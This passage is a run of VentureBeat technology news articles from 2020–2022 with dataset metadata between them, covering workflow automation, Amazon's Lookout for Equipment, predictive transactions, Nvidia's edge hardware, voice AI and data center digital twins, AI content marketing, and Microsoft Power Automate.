There are many other process automation tools out there already, such as Zapier for system integrations and Asana for workflow automation, but Hugenroth considers Next Matter the only end-to-end option for operations teams that covers all the required functionalities. “Next Matter allows operations managers to skip the learning curve of other workflow tools and build reliable automation in a radically simplified way, with no prior experience necessary,” he said. “Because the platform was designed for non-technical business users, operations teams spend less time on training, configuration, and setup and more time getting real work done, with ease and reliability.” Next Matter also fits into a broader no-code and low-code trend that spans everything from web development to web testing and seeks to reduce repetitive manual tasks and improve efficiency. The company’s $4 million seed round was led by Blue Yard Capital, with participation from Crane Venture Partners, among other investors. As the company looks to expand its scope beyond Europe, it’s now looking to the U.S. "
15,135
2,021
"Amazon launches ML-powered maintenance tool Lookout for Equipment in general availability | VentureBeat"
"https://venturebeat.com/2021/04/08/amazon-launches-ml-powered-maintenance-tool-lookout-for-equipment-in-general-availability"
"Amazon launches ML-powered maintenance tool Lookout for Equipment in general availability Amazon today announced the general availability of Lookout for Equipment, a service that uses machine learning to help customers perform maintenance on equipment in their facilities. Launched in preview last year during Amazon Web Services (AWS) re:Invent 2020, Lookout for Equipment ingests sensor data from a customer’s industrial equipment and then trains a model to predict early warning signs of machine failure or suboptimal performance. Predictive maintenance technologies have been used for decades in jet engines and gas turbines, and companies like GE Digital’s Predix and Petasense offer Wi-Fi-enabled, cloud- and AI-driven sensors. According to a recent report by analysts at Markets and Markets, predictive factory maintenance could be worth $12.3 billion by 2025. 
Beyond Amazon, startups like Augury are vying for a slice of the segment. With Lookout for Equipment, industrial customers can build a predictive maintenance solution for a single facility or multiple facilities. To get started, companies upload their sensor data — like pressure, flow rate, RPMs, temperature, and power — to Amazon Simple Storage Service (S3) and provide the relevant S3 bucket location to Lookout for Equipment. The service will automatically sift through the data, look for patterns, and build a model that’s tailored to the customer’s operating environment. Lookout for Equipment will then use the model to analyze incoming sensor data and identify early warning signs of machine failure or malfunction. For each alert, Lookout for Equipment will specify which sensors are indicating an issue and measure the magnitude of its impact on the detected event. For example, if Lookout for Equipment spotted a problem on a pump with 50 sensors, the service could show which five sensors indicate an issue on a specific motor and relate that issue to the motor power current and temperature. “Many industrial and manufacturing companies have heavily invested in physical sensors and other technology with the aim of improving the maintenance of their equipment. But even with this gear in place, companies are not in a position to deploy machine learning models on top of the reams of data due to a lack of resources and the scarcity of data scientists,” VP of machine learning at AWS Swami Sivasubramanian said in a press release. 
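The ingestion step described above expects time-stamped sensor readings uploaded to S3. A minimal sketch of serializing such readings as CSV before upload; the column names here are hypothetical examples, not a schema Amazon mandates:

```python
import csv
import io

# Illustrative sensor columns; a real dataset would match the customer's
# own equipment sensors (pressure, flow rate, RPMs, temperature, power...).
FIELDS = ["timestamp", "pressure", "temperature", "rpm"]

def sensor_rows_to_csv(rows):
    """Serialize a list of sensor-reading dicts to a CSV string for S3 upload."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()
```

The resulting string could then be uploaded to the customer's S3 bucket (for example with a standard S3 client), and that bucket location handed to Lookout for Equipment.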
“Today, we’re excited to announce the general availability of Amazon Lookout for Equipment, a new service that enables customers to benefit from custom machine learning models that are built for their specific environment to quickly and easily identify abnormal machine behavior — so that they can take action to avoid the impact and expense of equipment downtime.” Lookout for Equipment is available via the AWS console, as well as through supporting partners in the AWS Partner Network. It launches today in US East (N. Virginia), EU (Ireland), and Asia Pacific (Seoul) server regions, with availability in additional regions in the coming months. The launch of Lookout for Equipment follows the general availability of Lookout for Metrics, a fully managed service that uses machine learning to monitor key factors impacting the health of enterprises. Both products are complemented by Amazon Monitron, an end-to-end equipment monitoring system to enable predictive maintenance with sensors, a gateway, an AWS cloud instance, and a mobile app. "
15,136
2,021
"Predictive transactions are the next big tech revolution | VentureBeat"
"https://venturebeat.com/2021/09/26/predictive-transactions-are-the-next-big-tech-revolution"
"Predictive transactions are the next big tech revolution In recent years, data has been the world’s hottest commodity. Money has gravitated towards companies that collect it, companies that analyse it, and the data infrastructure companies that provide the digital plumbing that makes it all possible. In the last five years, data infrastructure startups alone have raised over $8 billion of venture capital, at an aggregate value of $35 billion. We know the names of the biggest companies in the space; they include Databricks, Snowflake, Confluent, MongoDB, Segment, Looker, and Oracle. But what are they actually for? Most investors will talk about how data can, in theory, be used to derive trends. 
Others may talk about how data will change the world, without filling in the blanks on how. I don’t disagree. I’ve worked and invested in data companies for my entire career. But I think they are missing something big. There is a powerful disruption coming; perhaps the most powerful since computerized transaction processing was invented in 1964. Predictive transaction processing is about to upend the model of the last 57 years of computing and change the way we live, work, shop, and entertain. For businesses to remain relevant and competitive, they not only need to be able to predict customer behavior and preferences, they also need to rely on predictive transactions to automate most of their business interactions, i.e., taking automated actions while selling to or servicing the customer. A transformative new model Since the dawn of computing, transaction processing has been performed in much the same way. The user makes a request, the request is processed, and if you’re lucky, afterwards the user’s choices are analysed. This is what happens across many platforms today. When I buy a product from Amazon, machine learning may be used to make recommendations. But the decision to purchase is fundamentally something that I, the customer, must make. When I browse Netflix, it will algorithmically suggest content that I may like to watch, but once again I must make the choice to hit play. We call this “artificial intelligence” but I think this is not smart enough. The real transformation will happen when we move to a predictive computing model. Picture this: You’ve just got home from work, and an Amazon delivery truck arrives at your door, carrying the 25 household items, from dry groceries to cleaning supplies, you’ll need that week, informed by your in-depth customer profile. 
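A toy illustration of how such a weekly basket might be predicted: if each item's historical purchase interval is known, the items "due" for reorder can be flagged automatically. All names and numbers below are illustrative, not any retailer's actual model:

```python
def items_due(history, today):
    """Return items whose usual repurchase interval has elapsed.

    history: {item: (last_purchase_day, usual_interval_days)}
    today: current day number on the same timeline.
    """
    return sorted(item for item, (last, interval) in history.items()
                  if today - last >= interval)
```

A real system would learn the intervals (and confidence in them) from purchase data rather than hard-coding them, but the shape of the decision is the same: the transaction is initiated by the prediction, not by the shopper.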
Any of the items you don’t need (an unlikely occasion given the enhanced machine learning) can easily be returned – information which adds to the database that continually improves the engine’s learning and ability to predict your behavior. The use case is clear – when transactions move from enhancing decisions (i.e. recommended bundle items) to predicting purchase decisions, consumers will be able to let Amazon handle their daily purchases, giving them back time in their busy lives. In terms of logistics, last-mile delivery technology will ensure that people get what they want when they need it, easing the traffic congestion caused by delivery trucks currently hindered by uncertain time frames and unavailable customers. Given Amazon’s sophisticated logistics and data assets, this scenario isn’t hard to imagine. Amazon has data on your shopping habits from a lifetime of purchases. It has your credit card details. And it has the unrivalled ability to ship goods quickly at scale. The same can be true for Netflix, and other entertainment platforms like Spotify. They know our habits, so why wait for us to tell them what they already know before they entertain us? As Benedict Evans says, a computer should never ask a question it knows the answer to. This, however, is only the beginning. The Predictive Transaction Processing model is not just an opportunity to improve our lives, existing systems and business models. It will be critical for unlocking the transformative technologies of the future. Take autonomous vehicles, for example. We are not going to reach “Level 5” autonomy if the car only has its own built-in sensors to rely on. We need all the cars, from the human-driven ones to cloud learning vehicles, for the risks on the road ahead to be computed using data collected by every autonomous vehicle. And we need this computation to be predictive, to steer our vehicles in anticipation of the dangers that lie ahead. 
If systems act on the predictive model, based on data, automotive accidents can become a thing of the past. Predictive transactions will become crucial to industries from DTC commerce and entertainment to transportation, logistics, and even healthcare – as each stands to reap the benefits from this incredibly incisive insight into their customer/client base and their habits. Putting the building blocks in place There are already companies taking tentative steps towards the predictive future. Most notably, there is ByteDance’s TikTok. With $34bn revenue in 2020, it is the most profitable predictive transaction processing app ever created. Open the app and you will be presented with an endless stream of autoplaying short-form videos. As you watch, the algorithm will learn what you like based not on your stated preference, but on your revealed preference. In other words, if you’re spending longer watching videos of pets than people singing or performing stunts, the app will show you more pets, without you ever needing to press play or type words into a search box. Companies that are being built today need to follow ByteDance’s example and invest in and build the key technologies that will move us towards the Predictive Transaction Processing model. As part of the shift from user-instrumented interactions to decisions made by learning systems and data, we will need to retool and redesign the entire technology stack. For example, we will need improved machine learning models that are more precise in their predictions, as marginal gains will make the difference when they are cascaded through a logistics chain. We will also need learning systems that can look backwards and correct for previous mistakes, so that errors are not compounded. We will also need to replace long-held sacred cows, such as the J2EE standards that have underpinned ecommerce for a generation. Applications based on learning from data are very different to those based on the traditional relational database. 
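The revealed-preference loop described above, ranking by engagement rather than stated choices, can be sketched in a few lines. This is a minimal illustration of the idea only; ByteDance's actual ranking system is far more sophisticated, and every name below is invented:

```python
from collections import defaultdict

def update_preferences(prefs, watch_events):
    # Watch time is the "revealed preference" signal: no likes,
    # searches, or play buttons required.
    for category, seconds in watch_events:
        prefs[category] += seconds
    return prefs

def rank_feed(prefs, candidates):
    # Surface candidates from the categories the user lingers on longest.
    return sorted(candidates, key=lambda c: prefs[c["category"]], reverse=True)

prefs = defaultdict(float)
update_preferences(prefs, [("pets", 45), ("singing", 3), ("pets", 60), ("stunts", 5)])
feed = rank_feed(prefs, [
    {"id": 1, "category": "singing"},
    {"id": 2, "category": "pets"},
    {"id": 3, "category": "stunts"},
])
print([video["id"] for video in feed])  # → [2, 3, 1]
```

The pets videos rise to the top purely because they accumulated the most watch time, which is the behavior the article attributes to the app.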
We will also need new development and debugging tools, such as new lower-level programming languages to enable us to interrogate data more effectively. Application integration will also increase in complexity as apps will be entirely driven by data rather than design. And ultimately, there will need to be a step change in the reliability of real time transaction processing applications. If predictive data is to be mission critical, we need platforms and products that reduce downtime, enable instant recovery and have automatic failover capabilities. The real opportunity The Predictive Transaction Processing revolution is imminent. It may be the most exciting innovation that enterprise computing has ever seen. When the technological building blocks fall into place and apps finally come to market, the impact will be felt immediately. The number of transactions on predictive platforms will skyrocket. There will be enormous opportunities to improve the efficiency of existing systems, and a lucrative role for the ecosystem of companies that create the middleware that make it possible. And the SaaS enterprise platforms that dominate today will risk becoming obsolete. So it’s time to embrace Predictive Transaction Processing, and wise investors will take a lesson from this new paradigm: It’s time to look forward, and make decisions now about where to put your money knowing what is coming. Alfred Chuang is General Partner at Race Capital (Databricks, FTX, Solana, Opaque), where he invests heavily in data infrastructure. Prior to this he was co-founder and former Chairman & CEO of BEA Systems and led its acquisition by Oracle for $8.6 billion. 
"
15,137
2,022
"Nvidia debuts new hardware targeting the edge, including Isaac Nova Orin | VentureBeat"
"https://venturebeat.com/2022/03/22/nvidia-debuts-new-hardware-targeting-the-edge-including-isaac-nova-orin"
"Nvidia debuts new hardware targeting the edge, including Isaac Nova Orin During its March 2022 GPU Technology Conference (GTC) this week, Nvidia unveiled Isaac Nova Orin, a computing and sensor architecture powered by the company’s Jetson AGX Orin hardware. Nvidia says that Isaac Nova Orin comes with “all the compute and sensor hardware needed to design, build, and test autonomy” in autonomous mobile robots (AMRs) — types of robots that can understand and move through their environment without being overseen directly by an operator. Warehousing and logistics organizations, among others, apply AMRs to tasks that’d be harmful to — or not possible for — teams of human workers. 
Using AI, compute, and a sophisticated set of sensors, AMRs can carry heavy loads while dynamically assessing and responding to their surroundings — assisting with tasks including locating, picking, and moving inventory. An IDC survey found that over 70% of order fulfillment operations and warehouses that deploy AMRs have experienced double-digit improvement in KPIs like cycle time, productivity, and inventory efficiency. (Cycle time refers to the amount of time a team spends actually working on producing an item until the item is ready for shipment.) That’s perhaps why the global AMR market was worth roughly $1.67 billion in 2020, according to Fortune Business Insights, and projected to grow to $8.7 billion by 2028. Isaac Nova Orin and Jetson AGX Orin Isaac Nova Orin, which will be available later this year, pairs two Jetson AGX Orin units to deliver up to 550 TOPS of power. In hardware, TOPS — which stands for “trillions of operations per second” — indicates how many computing operations, or basic math problems, a chip can handle over a short period of time. As my former colleague Jeremy Horwitz notes, TOPS, while often touted in marketing materials, aren’t necessarily the best way to measure a chip’s capabilities. But Nvidia is spotlighting Isaac Nova Orin’s other features, like its ability to process data in real time from up to six cameras, three lidars, and eight ultrasonic sensors from an AMR. Over-the-air software management support is “preintegrated” in Isaac Nova Orin and the hardware is “calibrated and tested to work out of the box,” Nvidia says. Isaac Nova Orin includes tools necessary to simulate the robot as well as software modules designed to accelerate perception and navigation tasks and map different robots’ environments. 
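As a back-of-envelope illustration of what a TOPS rating does and does not tell you, latency can be estimated from peak TOPS and an assumed utilization factor. Both the 200-GOP model size and the 30% utilization below are arbitrary assumptions for the example, which is precisely why peak TOPS alone makes a poor benchmark:

```python
def inference_time_ms(model_gops, tops, utilization=0.3):
    """Back-of-envelope latency estimate from a peak TOPS rating.
    model_gops: operations per inference, in billions (GOPs).
    utilization: fraction of peak actually sustained; real workloads
    rarely hit 100%, and the 0.3 default here is purely illustrative."""
    effective_ops_per_sec = tops * 1e12 * utilization
    return model_gops * 1e9 / effective_ops_per_sec * 1000  # milliseconds

# A hypothetical 200-GOP perception model on Isaac Nova Orin's 550 TOPS:
print(round(inference_time_ms(200, 550), 2))  # → 1.21 (ms)
```

Doubling the assumed utilization halves the estimate, so memory bandwidth, sensor handling, and software efficiency matter at least as much as the headline number.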
Alongside Isaac Nova Orin, Nvidia announced that the Jetson AGX Orin developer kit, which the company first detailed in November, is now available to customers for purchase. Readers will recall that Jetson AGX Orin delivers 275 TOPS of compute power and features Nvidia’s Ampere architecture GPU, Arm Cortex-A78AE CPUs, AI and vision accelerators, and high-speed chip-to-chip interfaces. Microsoft, John Deere, Amazon, Hyundai, and JD.com are among the early adopters of Jetson AGX Orin. Developer kits start at $1,999, and production modules will be available in Q4 2022 for $399. “As AI transforms manufacturing, healthcare, retail, transportation, smart cities and other essential sectors of the economy, demand for processing continues to surge,” Deepu Talla, VP of embedded and edge computing at Nvidia, said in a press release. “A million developers and more than 6,000 companies have already turned to Jetson. The availability of Jetson AGX Orin will supercharge the efforts of the entire industry as it builds the next generation of robotics and edge AI products.” Edge opportunity With Isaac Nova Orin and Jetson AGX Orin, Nvidia is competing for a slice of the rapidly growing edge computing segment. Generally speaking, “edge computing” encompasses computing and storage resources at the location where data is produced, including on — or near — AMRs. STL Partners recently estimated that the edge computing addressable market will grow from $10 billion in size in 2020 to $543 billion in 2030. Edge computing offers several advantages compared with cloud-based technologies, but it isn’t without challenges. Keeping data locally means more locations to protect, with increased physical access allowing for different kinds of cyberattacks. (Some experts argue the decentralized nature of edge computing leads to increased security.) And compute is limited at the edge, which restricts the number of tasks that can be performed. 
Even so, Gartner predicts that more than 50% of large organizations will deploy at least one edge computing application to support the internet of things or immersive experiences by the end of 2021, up from less than 5% in 2019. The number of edge computing use cases could jump even further in the upcoming years, with the firm expecting that more than half of large enterprises will have at least six edge computing use cases deployed by the end of 2023. "
15,138
2,022
"AI Weekly: Nvidia's commitment to voice AI -- and a farewell | VentureBeat"
"https://venturebeat.com/2022/03/25/ai-weekly-nvidias-commitment-to-voice-ai-and-a-farewell"
"AI Weekly: Nvidia’s commitment to voice AI — and a farewell This week, Nvidia announced a slew of AI-focused hardware and software innovations during its March GTC 2022 conference. The company unveiled the Grace CPU Superchip, a data center processor designed to serve high-performance compute and AI applications. And it detailed the H100, the first in a new line of GPU hardware aimed at accelerating AI workloads including training large natural language models. But one announcement that slipped under the radar was the general availability of Nvidia’s Riva 2.0 SDK, as well as the company’s Riva Enterprise managed offering. Both can be deployed for building speech AI applications and point to the growing market for speech recognition in particular. 
The speech and voice recognition market is expected to grow from $8.3 billion in 2021 to $22.0 billion by 2026, according to Markets and Markets, driven by enterprise applications. In 2018, a Pindrop survey of 500 IT and business decision-makers found that 28% were using voice technology with customers. Gartner, meanwhile, predicted in 2019 that 25% of digital workers will use virtual employee assistants daily by 2021. And a recent Opus survey found that 73% of executives see value in AI voice technologies for “operational efficiency.” “As speech AI is expanding to new applications, data scientists at enterprises are looking to develop, customize and deploy speech applications,” an Nvidia spokesperson told VentureBeat via email. “Riva 2.0 includes strong integration with TAO, a low code solution for data scientists, to customize and deploy speech applications. This is an active area of focus and we plan to make the workflow even more accessible for customers in the future. We have also introduced Riva on embedded platforms for early access, and will have more to share at a later date.” Nvidia says that Snap, the company behind Snapchat, has integrated Riva’s automatic speech recognition and text-to-speech technologies into its developer platform. RingCentral, another customer, is leveraging Riva’s automatic speech recognition for video conferencing live-captioning. Speech technologies span voice generation tools, too, including “voice cloning” tools that use AI to mimic the pitch and prosody of a person’s speech. Last fall, Nvidia unveiled Riva Custom Voice, a new toolkit that the company claims can enable customers to create custom, “human-like” voices with only 30 minutes of speech recording data. Brand voices like Progressive’s Flo are often tasked with recording phone trees and elearning scripts in corporate training video series. 
For companies, the costs can add up — one source pegs the average hourly rate for voice actors at $39.63, plus additional fees for interactive voice response (IVR) prompts. Synthetization could boost actors’ productivity by cutting down on the need for additional recordings, potentially freeing the actors up to pursue more creative work — and saving businesses money in the process. According to Markets and Markets, the global voice cloning market could grow from $456 million in value in 2018 to $1.739 billion by 2023. As far as what lies on the horizon, Nvidia sees new voice applications going into production across augmented reality, videoconferencing, and conversational AI. Customers’ expectations and focus are on high accuracy as well as ways to customize voice experiences, the company says. “Low-code solutions for speech AI [will continue to grow] as non-software developers are looking to build, fine-tune, and deploy speech solutions,” the spokesperson continued, referencing low-code development platforms that require little to no coding in order to build voice apps. “New research is bringing emotional text-to-speech, transforming how humans will interact with machines.” Exciting as these technologies are, they will — and already have — introduced new ethical challenges. For example, fraudsters have used cloning to imitate a CEO’s voice well enough to initiate a wire transfer. And some speech recognition and text-to-speech algorithms have been shown to recognize the voices of minority users less accurately than those with more common inflections. It’s incumbent on companies like Nvidia to make efforts to address these challenges before deploying their technologies into production. 
To its credit, the company has taken steps in the right direction, for example prohibiting the use of Riva for the creation of “fraudulent, false, misleading, or deceptive” content as well as content that “promote[s] discrimination, bigotry, racism, hatred, harassment, or harm against any individual or group.” Hopefully, there’s more along this vein to come. A farewell As an addendum to this week’s newsletter, it’s with sadness that I announce I’m leaving VentureBeat to pursue professional opportunities elsewhere. This edition of AI Weekly will be my last — a bittersweet realization, indeed, as I try to find the words to put to paper. When I joined VentureBeat as an AI staff writer four years ago, I had only the vaguest notion of the difficult journey that lay ahead. I wasn’t exceptionally well-versed in AI — my background was in consumer tech — and the industry’s jargon was overwhelming to me, not to mention contradictory. But as I came to learn particularly from those on the academic side of data science, an open mind — and a willingness to admit ignorance, frankly — is perhaps the most important ingredient in making sense of AI. I haven’t always been successful in this. But as a reporter, I’ve tried not to lose sight of the fact that my domain knowledge pales in comparison to that of titans of industry and academia. Whether tackling stories about biases in computer vision models or the environmental impact of training language systems, it’s my policy to lean on others for their expert perspectives and present these perspectives, lightly edited, to readers. As I see it, my job is to contextualize and rely on, not to pontificate. There’s a place for pontification, but it’s on opinion pages — not news articles. I’ve learned a healthy dose of skepticism goes a long way, too, in reporting on AI. 
It’s not only the snake oil salesmen one must be wary of, but the corporations with well-oiled PR operations, lobbyists, and paid consultants claiming to prevent harms but in fact doing the opposite. I’ve lost track of the number of ethics boards that’ve been dissolved or have proven to be toothless; the number of damaging algorithms that have been sold to customers; and the number of companies that have attempted to silence or push back against whistleblowers. The silver lining is regulators’ growing realization of the industry’s deception. But, as elsewhere in Silicon Valley, techno-optimism has revealed itself to be little more than a publicity instrument. It’s easy to get swept up in the novelty of new technology. I once did — and still do. The challenge is recognizing the danger in this novelty. I’m reminded of the novel When We Cease to Understand the World by the Chilean writer Benjamín Labatut, which examines great scientific discoveries that led to prosperity and untold suffering in equal parts. For example, German chemist Fritz Haber developed the Haber-Bosch process, which synthesizes ammonia from nitrogen and hydrogen gases and almost certainly prevented famine by enabling the mass manufacture of fertilizer. At the same time, the Haber-Bosch process simplified and made cheaper the production of explosives, contributing to millions of deaths suffered by soldiers during World War I. AI, like the Haber-Bosch process, has the potential for enormous good — and good actors are trying desperately to bring this to fruition. But any technology can be misused, and it’s the job of reporters to uncover and spotlight those misuses — ideally to effect change. It’s my hope that I, along with my distinguished colleagues at VentureBeat, have accomplished this in some small part. Here’s to a future of strong AI reporting. For AI coverage, be sure to subscribe to the AI Weekly newsletter and bookmark our AI channel, The Machine. 
Thanks for reading, Kyle Wiggers Senior AI Staff Writer "
15,139
2,022
"Nvidia Air gives new meaning to infrastructure-as-code | VentureBeat"
"https://venturebeat.com/2022/03/25/nvidia-air-gives-new-meaning-to-infrastructure-as-code"
"Nvidia Air gives new meaning to infrastructure-as-code Enterprises increasingly leverage infrastructure-as-code (IaC) to systematically provision cloud resources and containerized workloads. IaC is a critical element of modern software development pipelines that ensures consistency and helps enterprises respond to problems or experiment with new business ideas. At the Nvidia GTC conference, Nvidia engineers described their work to build a digital twin of data center infrastructure. This work promises to extend IaC and continuous integration/continuous deployment practices all the way into physical data center design. Nvidia has been using these new tools internally to improve its own data center design and is now starting to integrate them into Nvidia Air. 
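The core of the IaC practice described above can be captured in a toy "reconcile" step: the desired infrastructure is declared as data, and a loop computes the actions needed to make reality match. This sketch is tool-agnostic and hypothetical; it is not the API of Nvidia Air or of any specific IaC product:

```python
def reconcile(desired, actual):
    """Diff a declared (desired) infrastructure state against the
    observed (actual) one and emit the actions needed to converge."""
    actions = []
    for name, spec in desired.items():
        if name not in actual:
            actions.append(("create", name, spec))
        elif actual[name] != spec:
            actions.append(("update", name, spec))
    for name in actual:
        if name not in desired:
            actions.append(("delete", name))
    return actions

desired = {"web": {"replicas": 3}, "cache": {"replicas": 1}}
actual = {"web": {"replicas": 2}, "old-batch": {"replicas": 1}}
print(reconcile(desired, actual))
# → [('update', 'web', {'replicas': 3}), ('create', 'cache', {'replicas': 1}), ('delete', 'old-batch')]
```

A digital twin extends the same idea to physical state: the "actual" side is populated from sensors and telemetry rather than from a cloud provider's API.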
This complements other digital twin offerings like Nvidia Drive for autonomous vehicles, Isaac for robots and Clara for healthcare. Nvidia Air will allow enterprises to build a full digital twin of a data center’s physical and logical layout before installing the first switch in the data center. They can then continue to use those same simulations, visualizations and AI tools once the data center is in production. Today, most of the design assets are essentially filed away and forgotten once a data center goes live, which in many respects mirrors the old waterfall style of test and development before Agile came along. Lost assets These challenges are only growing in complexity with the need for new AI infrastructure that stretches the limits of compute, networking, storage, power and thermal management. “Many classic supercomputers cost millions of dollars and take months or even years to deploy,” said Marc Hamilton, vice president of solutions architecture and engineering at Nvidia. Designing a data center is an extremely complex team sport with diverse skills. The data center building itself and the layout of racks and other components might be done in Autodesk. The cables, servers, switches and storage are designed with various 3D CAD tools. Teams often turn to other tools for modeling airflow and heat using computational fluid dynamics simulations from Ansys. These kinds of simulations are usually done in design, but once the computer goes into production, the operations team never sees them. If a problem arises, the operations team needs to start over again to figure out how to improve airflow or address an overheating issue. Nvidia worked with design tools from many vendors in the past, and the resulting files were incompatible across engineering teams. 
It was generally a time-consuming process to transfer files across tools, and, in some cases, the formats were not compatible. If an engineer changed the layout to improve the thermal properties, it wasn’t always propagated back to the team designing heat sinks or cable routing. Design for reuse So Nvidia turned to the Omniverse to see if there was a better way to connect these workflows. Omniverse is built on top of a common database called Nucleus, which allows all engineering tools to stage their data in a shared format across tools and teams. The Omniverse helps teams go back and forth between the photorealistic rendering of the data center as-built, overlaid with live thermal data, to analyze the predicted impact of various changes, such as moving two busy servers further apart. Most engineering simulation is done with high-performance workstations. The Omniverse allows teams to move more of the complex engineering and simulation workloads to tens of thousands of GPUs in the cloud and then share the result across the enterprise and partners. Another advantage of connecting back to the Omniverse is that new simulations can take advantage of improvements in the core algorithms. One of the biggest aspects of data center design is the computational fluid dynamics to understand the system’s airflow, heating and cooling. Hamilton’s team worked with Nvidia Modulus, a software development kit that uses AI to build surrogate models for physics. This allows them to simulate far more scenarios, such as minor differences in temperature settings or physical placement in the same amount of time. Now Nvidia is extending these modeling capabilities into its data center management tools called Base Command. This provides a set of tools to monitor and manage services. Today, if conditions change in the data center, such as a temperature spike, teams only have a rough idea of what might have caused it. 
Now Nvidia is exploring ways to extend Omniverse simulation capabilities to support logical infrastructure as well. This will make it easier to develop and test best practices for setting up networks, running power lines, and other things. This was one of the reasons Nvidia acquired Mellanox. “We started thinking about how to apply tools like Omniverse to simulating, predicting, and monitoring before you make changes to the network,” Hamilton said. Devops for hardware Amit Katz, vice president of the Nvidia Spectrum Platform, said the use of digital twins in data center designs is akin to the adoption of automation in the data center at the turn of the century. In the 1990s, engineers would typically type CLI commands into live data center environments. And sometimes, they would type the wrong commands. Then around the turn of the century, developers started provisioning infrastructure as code and developing against test environments that mimicked the real thing. Tools like Service Virtualization and test harnesses allowed teams to simulate API calls to enterprise and third-party services before pushing things into production. Now in 2022, he believes the world is going through a similar transition to simulate physical infrastructure as well. Katz said, “We are seeing digital twins for end-to-end data center validation, not only for switches but also for the entire data center.” Down the road, Nvidia Air could work as a recommendation engine for suggesting and prioritizing fixes and changes to data center designs and layout. This could also simplify the exchange of assets and configurations across teams, in the same way that IaC ensured that developer, test, and operations teams were working with the same code. It will extend those same benefits across developers, network operators and data scientists that use this infrastructure. The vision is that the digital twin helps teams lay out the data center down to each cable run. 
Then as teams start to install systems, the digital twin makes it easier to ensure that each cable is run correctly, and, if not, to see what needs to change. Then if something goes wrong, such as an outage or a failed power supply, the digital twin could help test out different remedies. Teams could test out various fixes beforehand to make changes with higher confidence of success. This would help complete the loop between the greater flexibility available in the cloud and the better economics available for on-premise deployments. “You can think of it as cloud agility with on-prem economics,” Katz said. "
15140
2021
"Accelerate your marketing plan by leveraging AI for content creation | VentureBeat"
"https://venturebeat.com/2021/11/24/accelerate-your-marketing-plan-by-leveraging-ai-for-content-creation"
"Accelerate your marketing plan by leveraging AI for content creation This article was contributed by Ajay Mangilal Jain, Senior Partner of AI & Automation Practice at Wipro Limited. Ecommerce has long been growing in popularity with private consumers and enterprises alike, but the pandemic drove an unprecedented flurry of activity even from segments that hadn’t previously embraced online shopping. With this rapid growth, and with customers’ evolved expectations for timing and delivery, there is a growing need for direct-to-consumer brands to accelerate their marketing capabilities. At the center of this trend is the need for content, which must now be scaled across different platforms and segments quickly and intelligently. 
However, this process is very demanding, and effective content creation for multiple platforms — including ecommerce — is almost impossible without appropriate artificial intelligence (AI) and machine learning (ML) infrastructure. When AI succeeds, so do content and content creation To influence people, companies need to say something smart and relevant to the customer. Great content resonates, creates relevance, and influences behavior. Creating this kind of content requires analyzing data across multiple platforms, evaluating response rates to different materials, and diving into customer sentiment and engagement. Unfortunately, all of this takes time, and lots of it. AI and ML have the potential to speed up this process. AI can analyze large quantities of data and make recommendations about the content most likely to elicit the intended response. This automated analysis helps companies generate meaningful content and scale up content development so that it is ideally suited for different platforms and market segments. Historically, direct-to-consumer brands have relied on AI and ML primarily for social listening and insights. While some social platforms have introduced in-app shopping, the majority of consumers still make purchases through traditional channels, and their social-media use is focused on product research. This makes social media a great place to influence consumer behavior and capture data. AI and ML consolidate data from these platforms — analyzing context, relevance, sentiment, and feedback to determine what motivates the consumer and predict the best-performing content for each scenario. Using AI/ML to extend ecommerce AI and ML can play a key role in the development of ecommerce content as well. With more purchases taking place online, new ways have emerged to meet demand. 
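That prediction step can be sketched minimally, assuming invented example data: rank each content variant by its observed engagement rate per platform and surface the likely best performer. Real systems use far richer signals (sentiment, context, feedback), but the shape of the loop is the same.

```python
# Toy illustration: rank content variants by observed engagement per platform
# to predict what is most likely to resonate. Data and field names are invented.

from collections import defaultdict

posts = [
    {"platform": "instagram", "variant": "recipe-video", "impressions": 12000, "engagements": 960},
    {"platform": "instagram", "variant": "gift-guide",   "impressions": 15000, "engagements": 600},
    {"platform": "ecommerce", "variant": "gift-guide",   "impressions": 8000,  "engagements": 720},
    {"platform": "ecommerce", "variant": "recipe-video", "impressions": 9000,  "engagements": 450},
]

def best_variant_per_platform(posts):
    """Pick the variant with the highest engagement rate on each platform."""
    rates = defaultdict(dict)
    for p in posts:
        rates[p["platform"]][p["variant"]] = p["engagements"] / p["impressions"]
    return {platform: max(variants, key=variants.get) for platform, variants in rates.items()}

print(best_variant_per_platform(posts))
# {'instagram': 'recipe-video', 'ecommerce': 'gift-guide'}
```

As new purchase channels emerge to meet online demand, each one becomes another engagement source feeding a ranking like this.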
This has introduced new complexities for content marketers as direct-to-consumer companies look to extend their presence to other platforms and commerce channels. By leveraging AI and ML , companies can overcome those complexities while increasing their visibility across platforms and gaining insights that ultimately drive growth. Consider the case of an international chocolate brand. At the start of 2019, the company had a sales presence both on its own website and a prominent ecommerce retail website, where it hosted a number of product pages to address various segments and test different keywords and images. The marketing team used the platform to analyze the most successful pages and determine which elements consumers found most relevant. The team also had to determine which search data was most relevant. The brand wanted to extend its online sales presence to additional retail websites and social platforms. This expansion, while promising, would essentially “trap” each outlet’s consumer behavior and sentiment data inside the respective platform. The challenge would then become how best to efficiently analyze what resonated with each platform’s audience and continue creating effective “feel-good” content that sets the company apart from its competition. By leveraging AI and ML, the chocolate brand was able to capture and combine data from its ecommerce channels, its own product site(s), and all the new platforms. The AI-enabled ability to gather and analyze content for each product, segment, and platform allowed the company to rapidly scale up and create the most relevant content for each digital property. In addition, the increased efficiency accelerated the content creation that resonated with target consumers, while also resulting in higher page visits and increased sales. While AI and ML are often viewed as technologies with limited applications outside of dry data analysis, they can in fact be used to fuel creativity. 
These tools enable companies to analyze branded content from multiple systems, create bridges between platforms, enhance content creation, and empower their marketing teams to create and scale the most relevant content across multiple platforms. Infusing AI into a marketing strategy helps direct-to-consumer brands quickly identify content that resonates, creates relevance, and influences behavior. All of these functions give companies the ability to quickly scale and react to sentiment changes in real time. Ajay Mangilal Jain is Senior Partner of AI & Automation Practice at Wipro Limited. "
15141
2020
"Microsoft debuts Power Automate process advisor and new RPA features | VentureBeat"
"https://venturebeat.com/2020/12/09/microsoft-power-automate-process-advisor-rpa-features"
"Microsoft debuts Power Automate process advisor and new RPA features Microsoft today announced the public preview of process advisor, a process mining capability in Power Automate that identifies processes for automation. At the same time, Microsoft Power Automate Desktop has hit general availability, marrying robotic process automation (RPA) capabilities to a desktop authoring experience. Microsoft today also added four RPA enhancements to Power Automate: role-based sharing, lifecycle management, setting execution priorities, and real-time run and queue monitoring. RPA is a form of business process automation that relies on bots or AI workers to eliminate repetitive tasks so humans can do what they do best. 
